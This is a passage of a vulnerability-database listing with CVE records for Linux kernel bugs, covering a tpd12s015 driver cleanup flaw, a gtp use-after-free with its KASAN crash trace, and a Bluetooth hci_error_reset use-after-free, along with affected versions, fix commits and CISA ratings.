"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/bridge: tpd12s015: Drop buggy __exit annotation for remove function\n\nWith tpd12s015_remove() marked with __exit this function is discarded\nwhen the driver is compiled as a built-in. The result is that when the\ndriver unbinds there is no cleanup done which results in resource\nleakage or worse."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:41:46.930Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/53926e2a39629702f7f809d614b3ca89c2478205"
},
{
"url": "https://git.kernel.org/stable/c/08ccff6ece35f08e8107e975903c370d849089e5"
},
{
"url": "https://git.kernel.org/stable/c/81f1bd85960b7a089a91e679ff7cd2524390bbf1"
},
{
"url": "https://git.kernel.org/stable/c/a8657406e12aa10412134622c58977ac657f16d2"
},
{
"url": "https://git.kernel.org/stable/c/e00ec5901954d85b39b5f10f94e60ab9af463eb1"
},
{
"url": "https://git.kernel.org/stable/c/ce3e112e7ae854249d8755906acc5f27e1542114"
}
],
"title": "drm/bridge: tpd12s015: Drop buggy __exit annotation for remove function",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52694",
"datePublished": "2024-05-17T14:27:27.169Z",
"dateReserved": "2024-03-07T14:49:46.889Z",
"dateUpdated": "2025-05-04T07:41:46.930Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26793 (GCVE-0-2024-26793)
Vulnerability from cvelistv5
Published
2024-04-04 08:20
Modified
2025-05-04 08:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
gtp: fix use-after-free and null-ptr-deref in gtp_newlink()
The gtp_link_ops operations structure for the subsystem must be
registered after registering the gtp_net_ops pernet operations structure.
Syzkaller hit 'general protection fault in gtp_genl_dump_pdp' bug:
[ 1010.702740] gtp: GTP module unloaded
[ 1010.715877] general protection fault, probably for non-canonical address 0xdffffc0000000001: 0000 [#1] SMP KASAN NOPTI
[ 1010.715888] KASAN: null-ptr-deref in range [0x0000000000000008-0x000000000000000f]
[ 1010.715895] CPU: 1 PID: 128616 Comm: a.out Not tainted 6.8.0-rc6-std-def-alt1 #1
[ 1010.715899] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.0-alt1 04/01/2014
[ 1010.715908] RIP: 0010:gtp_newlink+0x4d7/0x9c0 [gtp]
[ 1010.715915] Code: 80 3c 02 00 0f 85 41 04 00 00 48 8b bb d8 05 00 00 e8 ed f6 ff ff 48 89 c2 48 89 c5 48 b8 00 00 00 00 00 fc ff df 48 c1 ea 03 <80> 3c 02 00 0f 85 4f 04 00 00 4c 89 e2 4c 8b 6d 00 48 b8 00 00 00
[ 1010.715920] RSP: 0018:ffff888020fbf180 EFLAGS: 00010203
[ 1010.715929] RAX: dffffc0000000000 RBX: ffff88800399c000 RCX: 0000000000000000
[ 1010.715933] RDX: 0000000000000001 RSI: ffffffff84805280 RDI: 0000000000000282
[ 1010.715938] RBP: 000000000000000d R08: 0000000000000001 R09: 0000000000000000
[ 1010.715942] R10: 0000000000000001 R11: 0000000000000001 R12: ffff88800399cc80
[ 1010.715947] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000400
[ 1010.715953] FS: 00007fd1509ab5c0(0000) GS:ffff88805b300000(0000) knlGS:0000000000000000
[ 1010.715958] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1010.715962] CR2: 0000000000000000 CR3: 000000001c07a000 CR4: 0000000000750ee0
[ 1010.715968] PKRU: 55555554
[ 1010.715972] Call Trace:
[ 1010.715985] ? __die_body.cold+0x1a/0x1f
[ 1010.715995] ? die_addr+0x43/0x70
[ 1010.716002] ? exc_general_protection+0x199/0x2f0
[ 1010.716016] ? asm_exc_general_protection+0x1e/0x30
[ 1010.716026] ? gtp_newlink+0x4d7/0x9c0 [gtp]
[ 1010.716034] ? gtp_net_exit+0x150/0x150 [gtp]
[ 1010.716042] __rtnl_newlink+0x1063/0x1700
[ 1010.716051] ? rtnl_setlink+0x3c0/0x3c0
[ 1010.716063] ? is_bpf_text_address+0xc0/0x1f0
[ 1010.716070] ? kernel_text_address.part.0+0xbb/0xd0
[ 1010.716076] ? __kernel_text_address+0x56/0xa0
[ 1010.716084] ? unwind_get_return_address+0x5a/0xa0
[ 1010.716091] ? create_prof_cpu_mask+0x30/0x30
[ 1010.716098] ? arch_stack_walk+0x9e/0xf0
[ 1010.716106] ? stack_trace_save+0x91/0xd0
[ 1010.716113] ? stack_trace_consume_entry+0x170/0x170
[ 1010.716121] ? __lock_acquire+0x15c5/0x5380
[ 1010.716139] ? mark_held_locks+0x9e/0xe0
[ 1010.716148] ? kmem_cache_alloc_trace+0x35f/0x3c0
[ 1010.716155] ? __rtnl_newlink+0x1700/0x1700
[ 1010.716160] rtnl_newlink+0x69/0xa0
[ 1010.716166] rtnetlink_rcv_msg+0x43b/0xc50
[ 1010.716172] ? rtnl_fdb_dump+0x9f0/0x9f0
[ 1010.716179] ? lock_acquire+0x1fe/0x560
[ 1010.716188] ? netlink_deliver_tap+0x12f/0xd50
[ 1010.716196] netlink_rcv_skb+0x14d/0x440
[ 1010.716202] ? rtnl_fdb_dump+0x9f0/0x9f0
[ 1010.716208] ? netlink_ack+0xab0/0xab0
[ 1010.716213] ? netlink_deliver_tap+0x202/0xd50
[ 1010.716220] ? netlink_deliver_tap+0x218/0xd50
[ 1010.716226] ? __virt_addr_valid+0x30b/0x590
[ 1010.716233] netlink_unicast+0x54b/0x800
[ 1010.716240] ? netlink_attachskb+0x870/0x870
[ 1010.716248] ? __check_object_size+0x2de/0x3b0
[ 1010.716254] netlink_sendmsg+0x938/0xe40
[ 1010.716261] ? netlink_unicast+0x800/0x800
[ 1010.716269] ? __import_iovec+0x292/0x510
[ 1010.716276] ? netlink_unicast+0x800/0x800
[ 1010.716284] __sock_sendmsg+0x159/0x190
[ 1010.716290] ____sys_sendmsg+0x712/0x880
[ 1010.716297] ? sock_write_iter+0x3d0/0x3d0
[ 1010.716304] ? __ia32_sys_recvmmsg+0x270/0x270
[ 1010.716309] ? lock_acquire+0x1fe/0x560
[ 1010.716315] ? drain_array_locked+0x90/0x90
[ 1010.716324] ___sys_sendmsg+0xf8/0x170
[ 1010.716331] ? sendmsg_copy_msghdr+0x170/0x170
[ 1010.716337] ? lockdep_init_map
---truncated---
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 459aa660eb1d8ce67080da1983bb81d716aa5a69 Version: 459aa660eb1d8ce67080da1983bb81d716aa5a69 Version: 459aa660eb1d8ce67080da1983bb81d716aa5a69 Version: 459aa660eb1d8ce67080da1983bb81d716aa5a69 Version: 459aa660eb1d8ce67080da1983bb81d716aa5a69 Version: 459aa660eb1d8ce67080da1983bb81d716aa5a69 Version: 459aa660eb1d8ce67080da1983bb81d716aa5a69 Version: 459aa660eb1d8ce67080da1983bb81d716aa5a69 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.475Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/01129059d5141d62fae692f7a336ae3bc712d3eb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ec92aa2cab6f0048f10d6aa4f025c5885cb1a1b6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e668b92a3a01429923fd5ca13e99642aab47de69"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9376d059a705c5dfaac566c2d09891242013ae16"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/abd32d7f5c0294c1b2454c5a3b13b18446bac627"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/93dd420bc41531c9a31498b9538ca83ba6ec191e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5366969a19a8a0d2ffb3d27ef6e8905e5e4216f8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/616d82c3cfa2a2146dd7e3ae47bda7e877ee549e"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26793",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:50:52.672497Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:48.724Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/gtp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "01129059d5141d62fae692f7a336ae3bc712d3eb",
"status": "affected",
"version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
"versionType": "git"
},
{
"lessThan": "ec92aa2cab6f0048f10d6aa4f025c5885cb1a1b6",
"status": "affected",
"version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
"versionType": "git"
},
{
"lessThan": "e668b92a3a01429923fd5ca13e99642aab47de69",
"status": "affected",
"version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
"versionType": "git"
},
{
"lessThan": "9376d059a705c5dfaac566c2d09891242013ae16",
"status": "affected",
"version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
"versionType": "git"
},
{
"lessThan": "abd32d7f5c0294c1b2454c5a3b13b18446bac627",
"status": "affected",
"version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
"versionType": "git"
},
{
"lessThan": "93dd420bc41531c9a31498b9538ca83ba6ec191e",
"status": "affected",
"version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
"versionType": "git"
},
{
"lessThan": "5366969a19a8a0d2ffb3d27ef6e8905e5e4216f8",
"status": "affected",
"version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
"versionType": "git"
},
{
"lessThan": "616d82c3cfa2a2146dd7e3ae47bda7e877ee549e",
"status": "affected",
"version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/gtp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.7"
},
{
"lessThan": "4.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.309",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.271",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.212",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.151",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.81",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.21",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.309",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.271",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.212",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.151",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.81",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.21",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.9",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ngtp: fix use-after-free and null-ptr-deref in gtp_newlink()\n\nThe gtp_link_ops operations structure for the subsystem must be\nregistered after registering the gtp_net_ops pernet operations structure.\n\nSyzkaller hit \u0027general protection fault in gtp_genl_dump_pdp\u0027 bug:\n\n[ 1010.702740] gtp: GTP module unloaded\n[ 1010.715877] general protection fault, probably for non-canonical address 0xdffffc0000000001: 0000 [#1] SMP KASAN NOPTI\n[ 1010.715888] KASAN: null-ptr-deref in range [0x0000000000000008-0x000000000000000f]\n[ 1010.715895] CPU: 1 PID: 128616 Comm: a.out Not tainted 6.8.0-rc6-std-def-alt1 #1\n[ 1010.715899] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.0-alt1 04/01/2014\n[ 1010.715908] RIP: 0010:gtp_newlink+0x4d7/0x9c0 [gtp]\n[ 1010.715915] Code: 80 3c 02 00 0f 85 41 04 00 00 48 8b bb d8 05 00 00 e8 ed f6 ff ff 48 89 c2 48 89 c5 48 b8 00 00 00 00 00 fc ff df 48 c1 ea 03 \u003c80\u003e 3c 02 00 0f 85 4f 04 00 00 4c 89 e2 4c 8b 6d 00 48 b8 00 00 00\n[ 1010.715920] RSP: 0018:ffff888020fbf180 EFLAGS: 00010203\n[ 1010.715929] RAX: dffffc0000000000 RBX: ffff88800399c000 RCX: 0000000000000000\n[ 1010.715933] RDX: 0000000000000001 RSI: ffffffff84805280 RDI: 0000000000000282\n[ 1010.715938] RBP: 000000000000000d R08: 0000000000000001 R09: 0000000000000000\n[ 1010.715942] R10: 0000000000000001 R11: 0000000000000001 R12: ffff88800399cc80\n[ 1010.715947] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000400\n[ 1010.715953] FS: 00007fd1509ab5c0(0000) GS:ffff88805b300000(0000) knlGS:0000000000000000\n[ 1010.715958] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 1010.715962] CR2: 0000000000000000 CR3: 000000001c07a000 CR4: 0000000000750ee0\n[ 1010.715968] PKRU: 55555554\n[ 1010.715972] Call Trace:\n[ 1010.715985] ? __die_body.cold+0x1a/0x1f\n[ 1010.715995] ? die_addr+0x43/0x70\n[ 1010.716002] ? exc_general_protection+0x199/0x2f0\n[ 1010.716016] ? asm_exc_general_protection+0x1e/0x30\n[ 1010.716026] ? gtp_newlink+0x4d7/0x9c0 [gtp]\n[ 1010.716034] ? gtp_net_exit+0x150/0x150 [gtp]\n[ 1010.716042] __rtnl_newlink+0x1063/0x1700\n[ 1010.716051] ? rtnl_setlink+0x3c0/0x3c0\n[ 1010.716063] ? is_bpf_text_address+0xc0/0x1f0\n[ 1010.716070] ? kernel_text_address.part.0+0xbb/0xd0\n[ 1010.716076] ? __kernel_text_address+0x56/0xa0\n[ 1010.716084] ? unwind_get_return_address+0x5a/0xa0\n[ 1010.716091] ? create_prof_cpu_mask+0x30/0x30\n[ 1010.716098] ? arch_stack_walk+0x9e/0xf0\n[ 1010.716106] ? stack_trace_save+0x91/0xd0\n[ 1010.716113] ? stack_trace_consume_entry+0x170/0x170\n[ 1010.716121] ? __lock_acquire+0x15c5/0x5380\n[ 1010.716139] ? mark_held_locks+0x9e/0xe0\n[ 1010.716148] ? kmem_cache_alloc_trace+0x35f/0x3c0\n[ 1010.716155] ? __rtnl_newlink+0x1700/0x1700\n[ 1010.716160] rtnl_newlink+0x69/0xa0\n[ 1010.716166] rtnetlink_rcv_msg+0x43b/0xc50\n[ 1010.716172] ? rtnl_fdb_dump+0x9f0/0x9f0\n[ 1010.716179] ? lock_acquire+0x1fe/0x560\n[ 1010.716188] ? netlink_deliver_tap+0x12f/0xd50\n[ 1010.716196] netlink_rcv_skb+0x14d/0x440\n[ 1010.716202] ? rtnl_fdb_dump+0x9f0/0x9f0\n[ 1010.716208] ? netlink_ack+0xab0/0xab0\n[ 1010.716213] ? netlink_deliver_tap+0x202/0xd50\n[ 1010.716220] ? netlink_deliver_tap+0x218/0xd50\n[ 1010.716226] ? __virt_addr_valid+0x30b/0x590\n[ 1010.716233] netlink_unicast+0x54b/0x800\n[ 1010.716240] ? netlink_attachskb+0x870/0x870\n[ 1010.716248] ? __check_object_size+0x2de/0x3b0\n[ 1010.716254] netlink_sendmsg+0x938/0xe40\n[ 1010.716261] ? netlink_unicast+0x800/0x800\n[ 1010.716269] ? __import_iovec+0x292/0x510\n[ 1010.716276] ? netlink_unicast+0x800/0x800\n[ 1010.716284] __sock_sendmsg+0x159/0x190\n[ 1010.716290] ____sys_sendmsg+0x712/0x880\n[ 1010.716297] ? sock_write_iter+0x3d0/0x3d0\n[ 1010.716304] ? __ia32_sys_recvmmsg+0x270/0x270\n[ 1010.716309] ? lock_acquire+0x1fe/0x560\n[ 1010.716315] ? drain_array_locked+0x90/0x90\n[ 1010.716324] ___sys_sendmsg+0xf8/0x170\n[ 1010.716331] ? sendmsg_copy_msghdr+0x170/0x170\n[ 1010.716337] ? lockdep_init_map\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:56:40.199Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/01129059d5141d62fae692f7a336ae3bc712d3eb"
},
{
"url": "https://git.kernel.org/stable/c/ec92aa2cab6f0048f10d6aa4f025c5885cb1a1b6"
},
{
"url": "https://git.kernel.org/stable/c/e668b92a3a01429923fd5ca13e99642aab47de69"
},
{
"url": "https://git.kernel.org/stable/c/9376d059a705c5dfaac566c2d09891242013ae16"
},
{
"url": "https://git.kernel.org/stable/c/abd32d7f5c0294c1b2454c5a3b13b18446bac627"
},
{
"url": "https://git.kernel.org/stable/c/93dd420bc41531c9a31498b9538ca83ba6ec191e"
},
{
"url": "https://git.kernel.org/stable/c/5366969a19a8a0d2ffb3d27ef6e8905e5e4216f8"
},
{
"url": "https://git.kernel.org/stable/c/616d82c3cfa2a2146dd7e3ae47bda7e877ee549e"
}
],
"title": "gtp: fix use-after-free and null-ptr-deref in gtp_newlink()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26793",
"datePublished": "2024-04-04T08:20:23.771Z",
"dateReserved": "2024-02-19T14:20:24.178Z",
"dateUpdated": "2025-05-04T08:56:40.199Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26801 (GCVE-0-2024-26801)
Vulnerability from cvelistv5
Published
2024-04-04 08:20
Modified
2025-05-04 08:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: Avoid potential use-after-free in hci_error_reset
While handling the HCI_EV_HARDWARE_ERROR event, if the underlying
BT controller is not responding, the GPIO reset mechanism would
free the hci_dev and lead to a use-after-free in hci_error_reset.
Here's the call trace observed on a ChromeOS device with Intel AX201:
queue_work_on+0x3e/0x6c
__hci_cmd_sync_sk+0x2ee/0x4c0 [bluetooth <HASH:3b4a6>]
? init_wait_entry+0x31/0x31
__hci_cmd_sync+0x16/0x20 [bluetooth <HASH:3b4a 6>]
hci_error_reset+0x4f/0xa4 [bluetooth <HASH:3b4a 6>]
process_one_work+0x1d8/0x33f
worker_thread+0x21b/0x373
kthread+0x13a/0x152
? pr_cont_work+0x54/0x54
? kthread_blkcg+0x31/0x31
ret_from_fork+0x1f/0x30
This patch holds the reference count on the hci_dev while processing
a HCI_EV_HARDWARE_ERROR event to avoid potential crash.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: c7741d16a57cbf97eebe53f27e8216b1ff20e20c Version: c7741d16a57cbf97eebe53f27e8216b1ff20e20c Version: c7741d16a57cbf97eebe53f27e8216b1ff20e20c Version: c7741d16a57cbf97eebe53f27e8216b1ff20e20c Version: c7741d16a57cbf97eebe53f27e8216b1ff20e20c Version: c7741d16a57cbf97eebe53f27e8216b1ff20e20c Version: c7741d16a57cbf97eebe53f27e8216b1ff20e20c Version: c7741d16a57cbf97eebe53f27e8216b1ff20e20c |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.522Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e0b278650f07acf2e0932149183458468a731c03"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/98fb98fd37e42fd4ce13ff657ea64503e24b6090"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6dd0a9dfa99f8990a08eb8fdd8e79bee31c7d8e2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/da4569d450b193e39e87119fd316c0291b585d14"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/45085686b9559bfbe3a4f41d3d695a520668f5e1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2ab9a19d896f5a0dd386e1f001c5309bc35f433b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dd594cdc24f2e48dab441732e6dfcafd6b0711d1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2449007d3f73b2842c9734f45f0aadb522daf592"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26801",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-15T19:27:12.303916Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-15T19:27:19.532Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/bluetooth/hci_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e0b278650f07acf2e0932149183458468a731c03",
"status": "affected",
"version": "c7741d16a57cbf97eebe53f27e8216b1ff20e20c",
"versionType": "git"
},
{
"lessThan": "98fb98fd37e42fd4ce13ff657ea64503e24b6090",
"status": "affected",
"version": "c7741d16a57cbf97eebe53f27e8216b1ff20e20c",
"versionType": "git"
},
{
"lessThan": "6dd0a9dfa99f8990a08eb8fdd8e79bee31c7d8e2",
"status": "affected",
"version": "c7741d16a57cbf97eebe53f27e8216b1ff20e20c",
"versionType": "git"
},
{
"lessThan": "da4569d450b193e39e87119fd316c0291b585d14",
"status": "affected",
"version": "c7741d16a57cbf97eebe53f27e8216b1ff20e20c",
"versionType": "git"
},
{
"lessThan": "45085686b9559bfbe3a4f41d3d695a520668f5e1",
"status": "affected",
"version": "c7741d16a57cbf97eebe53f27e8216b1ff20e20c",
"versionType": "git"
},
{
"lessThan": "2ab9a19d896f5a0dd386e1f001c5309bc35f433b",
"status": "affected",
"version": "c7741d16a57cbf97eebe53f27e8216b1ff20e20c",
"versionType": "git"
},
{
"lessThan": "dd594cdc24f2e48dab441732e6dfcafd6b0711d1",
"status": "affected",
"version": "c7741d16a57cbf97eebe53f27e8216b1ff20e20c",
"versionType": "git"
},
{
"lessThan": "2449007d3f73b2842c9734f45f0aadb522daf592",
"status": "affected",
"version": "c7741d16a57cbf97eebe53f27e8216b1ff20e20c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/bluetooth/hci_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.0"
},
{
"lessThan": "4.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.309",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.271",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.212",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.151",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.81",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.21",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.309",
"versionStartIncluding": "4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.271",
"versionStartIncluding": "4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.212",
"versionStartIncluding": "4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.151",
"versionStartIncluding": "4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.81",
"versionStartIncluding": "4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.21",
"versionStartIncluding": "4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.9",
"versionStartIncluding": "4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
